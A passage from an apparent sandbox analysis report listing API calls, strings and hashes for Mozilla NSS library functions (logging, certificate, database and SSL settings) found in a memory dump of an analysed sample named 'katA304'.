                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C9F1E4F
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C9F1EA4
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C9F1ECD
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C9F1EEF
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C9F1F17
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C9F1F34
                                                            • PR_SetLogBuffering.NSS3(00004000), ref: 6C9F1F61
                                                            • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C9F1F6E
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9F1F83
                                                            • PR_SetLogFile.NSS3(00000000), ref: 6C9F1FA2
                                                            • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C9F1FB8
                                                            • OutputDebugStringA.KERNEL32(00000000), ref: 6C9F1FCB
                                                            • free.MOZGLUE(00000000), ref: 6C9F1FD2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                            • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                            • API String ID: 2013311973-4000297177
                                                            • Opcode ID: 0a2fc610866f8ec99fa887ed5b9bb6255c93b96d246862ab2ff898c7f5e3babd
                                                            • Instruction ID: b93a52e9ea1405c38b468b981c00ed19f476e20eb04ab8914f1393e4ad2ba53c
                                                            • Opcode Fuzzy Hash: 0a2fc610866f8ec99fa887ed5b9bb6255c93b96d246862ab2ff898c7f5e3babd
                                                            • Instruction Fuzzy Hash: EC51C0B1E042599BEF00DFE5DC48B9E77B8AF16308F180528E829DBA40E770E559CB91
                                                            APIs
                                                            • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64C50
                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64C5B
                                                            • PR_smprintf.NSS3(6CB3AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64C76
                                                            • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64CAE
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA64CC9
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA64CF4
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA64D0B
                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64D5E
                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64D68
                                                            • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CA64D85
                                                            • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CA64DA2
                                                            • free.MOZGLUE(?), ref: 6CA64DB9
                                                            • free.MOZGLUE(00000000), ref: 6CA64DCF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$R_smprintf$strlen$Alloc_Util
                                                            • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                            • API String ID: 3756394533-2552752316
                                                            • Opcode ID: 60f8379e28049ad286db0445805730a4170e2e39d3b6e339ffe48ef4ca3ae887
                                                            • Instruction ID: 98b03ff87446dd8608581695b476c47fe1161ae865680041e7814780d554ef94
                                                            • Opcode Fuzzy Hash: 60f8379e28049ad286db0445805730a4170e2e39d3b6e339ffe48ef4ca3ae887
                                                            • Instruction Fuzzy Hash: 054179B1D00181ABDB12DF5ADC54ABF3A65AF9634CF584124E81A5BF01EB31D8A4C7D3
                                                            APIs
                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CA0DDDE
                                                              • Part of subcall function 6CA60FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA087ED,00000800,6C9FEF74,00000000), ref: 6CA61000
                                                              • Part of subcall function 6CA60FF0: PR_NewLock.NSS3(?,00000800,6C9FEF74,00000000), ref: 6CA61016
                                                              • Part of subcall function 6CA60FF0: PL_InitArenaPool.NSS3(00000000,security,6CA087ED,00000008,?,00000800,6C9FEF74,00000000), ref: 6CA6102B
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CA0DDF5
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CA0DE34
                                                            • PR_Now.NSS3 ref: 6CA0DE93
                                                            • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CA0DE9D
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA0DEB4
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA0DEC3
                                                            • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CA0DED8
                                                            • PR_smprintf.NSS3(%s%s,?,?), ref: 6CA0DEF0
                                                            • PR_smprintf.NSS3(6CB3AAF9,(NULL) (Validity Unknown)), ref: 6CA0DF04
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA0DF13
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA0DF22
                                                            • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA0DF33
                                                            • free.MOZGLUE(00000000), ref: 6CA0DF3C
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA0DF4B
                                                            • free.MOZGLUE(00000000), ref: 6CA0DF74
                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA0DF8E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                            • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                            • API String ID: 1882561532-3437882492
                                                            • Opcode ID: f11affb34c49e890fa69f44da12d9e838c59b05e6214be3ab7fea83b480f1c85
                                                            • Instruction ID: d829377fd017064d32da9f41bff18fe2045b28dfba6e44600499273778c866d9
                                                            • Opcode Fuzzy Hash: f11affb34c49e890fa69f44da12d9e838c59b05e6214be3ab7fea83b480f1c85
                                                            • Instruction Fuzzy Hash: DB5194B2E002555BDF00DE65AD41ABF7BB9AF9539CF184028E809E7B00E731D955CBE1
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CA42DEC
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CA42E00
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CA42E2B
                                                            • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CA42E43
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CA14F1C,?,-00000001,00000000,?), ref: 6CA42E74
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CA14F1C,?,-00000001,00000000), ref: 6CA42E88
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA42EC6
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA42EE4
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA42EF8
                                                            • PR_Unlock.NSS3(?), ref: 6CA42F62
                                                            • TlsGetValue.KERNEL32 ref: 6CA42F86
                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6CA42F9E
                                                            • PR_Unlock.NSS3(?), ref: 6CA42FCA
                                                            • TlsGetValue.KERNEL32 ref: 6CA4301A
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA4302E
                                                            • PR_Unlock.NSS3(?), ref: 6CA43066
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA43085
                                                            • PR_Unlock.NSS3(?), ref: 6CA430EC
                                                            • TlsGetValue.KERNEL32 ref: 6CA4310C
                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6CA43124
                                                            • PR_Unlock.NSS3(?), ref: 6CA4314C
                                                              • Part of subcall function 6CA29180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CA5379E,?,6CA29568,00000000,?,6CA5379E,?,00000001,?), ref: 6CA2918D
                                                              • Part of subcall function 6CA29180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CA5379E,?,6CA29568,00000000,?,6CA5379E,?,00000001,?), ref: 6CA291A0
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07AD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07CD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07D6
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C98204A), ref: 6C9F07E4
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,6C98204A), ref: 6C9F0864
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C9F0880
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C98204A), ref: 6C9F08CB
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08D7
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08FB
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA4316D
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                            • String ID:
                                                            • API String ID: 3383223490-0
                                                            • Opcode ID: 139893baf37d460e8dc5f4715c37d26f1d2d61217b2127f6c44a010a5a2dd461
                                                            • Instruction ID: 181bfa1f4179bf7c5053bb86b78af82138709cc03c2b06936cffe4289df4c649
                                                            • Opcode Fuzzy Hash: 139893baf37d460e8dc5f4715c37d26f1d2d61217b2127f6c44a010a5a2dd461
                                                            • Instruction Fuzzy Hash: 02F1ACB1D01209DFDF00DFA8D845BAABBB5BF09318F188268EC45A7711E731E995CB81
                                                            APIs
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CA46943
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CA46957
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CA46972
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CA46983
                                                              • Part of subcall function 6CA46910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CA469AA
                                                              • Part of subcall function 6CA46910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CA469BE
                                                              • Part of subcall function 6CA46910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CA469D2
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CA469DF
                                                              • Part of subcall function 6CA46910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CA46A5B
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CA46D8C
                                                            • free.MOZGLUE(00000000), ref: 6CA46DC5
                                                            • free.MOZGLUE(?), ref: 6CA46DD6
                                                            • free.MOZGLUE(?), ref: 6CA46DE7
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CA46E1F
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA46E4B
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA46E72
                                                            • free.MOZGLUE(?), ref: 6CA46EA7
                                                            • free.MOZGLUE(?), ref: 6CA46EC4
                                                            • free.MOZGLUE(?), ref: 6CA46ED5
                                                            • free.MOZGLUE(00000000), ref: 6CA46EE3
                                                            • free.MOZGLUE(?), ref: 6CA46EF4
                                                            • free.MOZGLUE(?), ref: 6CA46F08
                                                            • free.MOZGLUE(00000000), ref: 6CA46F35
                                                            • free.MOZGLUE(?), ref: 6CA46F44
                                                            • free.MOZGLUE(?), ref: 6CA46F5B
                                                            • free.MOZGLUE(00000000), ref: 6CA46F65
                                                              • Part of subcall function 6CA46C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CA4781D,00000000,6CA3BE2C,?,6CA46B1D,?,?,?,?,00000000,00000000,6CA4781D), ref: 6CA46C40
                                                              • Part of subcall function 6CA46C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CA4781D,?,6CA3BE2C,?), ref: 6CA46C58
                                                              • Part of subcall function 6CA46C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CA4781D), ref: 6CA46C6F
                                                              • Part of subcall function 6CA46C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CA46C84
                                                              • Part of subcall function 6CA46C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CA46C96
                                                              • Part of subcall function 6CA46C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CA46CAA
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA46F90
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA46FC5
                                                            • PK11_GetInternalKeySlot.NSS3 ref: 6CA46FF4
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                            • String ID:
                                                            • API String ID: 1304971872-0
                                                            • Opcode ID: 70af167050dda6bbb8d8d286809494a5135ad8d121a9772d98e1a4c257d0451c
                                                            • Instruction ID: 41ff2f7df7136665aa2812b002b52b6cdecbd29b138eee88ba39715fa7e3d208
                                                            • Opcode Fuzzy Hash: 70af167050dda6bbb8d8d286809494a5135ad8d121a9772d98e1a4c257d0451c
                                                            • Instruction Fuzzy Hash: C8B182B4E012199FEF00CFA5D845B9EBBF5AF09348F188025E815E7B41E731E994CBA1
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6CA44C4C
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA44C60
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44CA1
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CA44CBE
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44CD2
                                                            • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44D3A
                                                            • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44D4F
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44DB7
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07AD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07CD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07D6
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C98204A), ref: 6C9F07E4
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,6C98204A), ref: 6C9F0864
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C9F0880
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C98204A), ref: 6C9F08CB
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08D7
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08FB
                                                            • TlsGetValue.KERNEL32 ref: 6CA44DD7
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA44DEC
                                                            • PR_Unlock.NSS3(?), ref: 6CA44E1B
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA44E2F
                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA44E5A
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA44E71
                                                            • free.MOZGLUE(00000000), ref: 6CA44E7A
                                                            • PR_Unlock.NSS3(?), ref: 6CA44EA2
                                                            • TlsGetValue.KERNEL32 ref: 6CA44EC1
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA44ED6
                                                            • PR_Unlock.NSS3(?), ref: 6CA44F01
                                                            • free.MOZGLUE(00000000), ref: 6CA44F2A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                            • String ID:
                                                            • API String ID: 759471828-0
                                                            • Opcode ID: f6b55201da5a510d29ee0c3182c1e60ab134350d3ccd526cbe45bf08fc3d9bc9
                                                            • Instruction ID: 7709081aa96f3e2ac21adac4e0c4726fb7090c5ac02dbc488eaee995a8314148
                                                            • Opcode Fuzzy Hash: f6b55201da5a510d29ee0c3182c1e60ab134350d3ccd526cbe45bf08fc3d9bc9
                                                            • Instruction Fuzzy Hash: 4CB1F275E002069FEB00EF68D885BAA77B4BF09318F488124ED1597B41EB34E9A5CBD1
                                                            APIs
                                                            • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CA96BF7), ref: 6CA96EB6
                                                              • Part of subcall function 6C9F1240: TlsGetValue.KERNEL32(00000040,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1267
                                                              • Part of subcall function 6C9F1240: EnterCriticalSection.KERNEL32(?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F127C
                                                              • Part of subcall function 6C9F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1291
                                                              • Part of subcall function 6C9F1240: PR_Unlock.NSS3(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F12A0
                                                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CB3FC0A,6CA96BF7), ref: 6CA96ECD
                                                            • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CA96EE0
                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CA96EFC
                                                            • PR_NewLock.NSS3 ref: 6CA96F04
                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA96F18
                                                            • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CA96BF7), ref: 6CA96F30
                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CA96BF7), ref: 6CA96F54
                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CA96BF7), ref: 6CA96FE0
                                                            • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CA96BF7), ref: 6CA96FFD
                                                            Strings
                                                            • NSS_SSL_CBC_RANDOM_IV, xrefs: 6CA96FF8
                                                            • SSLFORCELOCKS, xrefs: 6CA96F2B
                                                            • # SSL/TLS secrets log file, generated by NSS, xrefs: 6CA96EF7
                                                            • SSLKEYLOGFILE, xrefs: 6CA96EB1
                                                            • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CA96F4F
                                                            • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CA96FDB
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                            • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                            • API String ID: 412497378-2352201381
                                                            • Opcode ID: 2be8d6e6aae305cbdf365ec6689e287736a5788c6103ca0ac01eae8937d4665e
                                                            • Instruction ID: 954ab19f71d622916aa1a6d26c3e4eb3c2e1198ceef54b9b55215bfc98fbf068
                                                            • Opcode Fuzzy Hash: 2be8d6e6aae305cbdf365ec6689e287736a5788c6103ca0ac01eae8937d4665e
                                                            • Instruction Fuzzy Hash: FAA139B2A7989087E710463ECC023A932E2BB93329F5C4365E931C7FD9DB7594C08396
                                                            APIs
                                                            • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA15DEC
                                                            • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CA15E0F
                                                            • PORT_ZAlloc_Util.NSS3(00000828), ref: 6CA15E35
                                                            • SECKEY_CopyPublicKey.NSS3(?), ref: 6CA15E6A
                                                            • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CA15EC3
                                                            • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CA15ED9
                                                            • SECKEY_SignatureLen.NSS3(?), ref: 6CA15F09
                                                            • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CA15F49
                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA15F89
                                                            • free.MOZGLUE(?), ref: 6CA15FA0
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA15FB6
                                                            • free.MOZGLUE(00000000), ref: 6CA15FBF
                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA1600C
                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA16079
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA16084
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA16094
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                            • String ID:
                                                            • API String ID: 2310191401-3916222277
                                                            • Opcode ID: f9f55b87c09e624c052f0aa86217f04505e3c391687a3c5693449ef2bcff2c09
                                                            • Instruction ID: 7bdfa098a17f30dace47956b7e7715f5f5ebb55ecffe299caa7bde61304ac6da
                                                            • Opcode Fuzzy Hash: f9f55b87c09e624c052f0aa86217f04505e3c391687a3c5693449ef2bcff2c09
                                                            • Instruction Fuzzy Hash: C481F6B5E082059BDB10CE64CD80BAE77B5AF05318F188128E819E7F91E731E998CBD1
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_Digest), ref: 6CA36D86
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA36DB4
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA36DC3
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA36DD9
                                                            • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CA36DFA
                                                            • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CA36E13
                                                            • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CA36E2C
                                                            • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CA36E47
                                                            • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CA36EB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                            • API String ID: 1003633598-2270781106
                                                            • Opcode ID: 19f3206cb8d57b82d96000265fa36f2af6343ef1e3be74cde65a6f7ad20a60d7
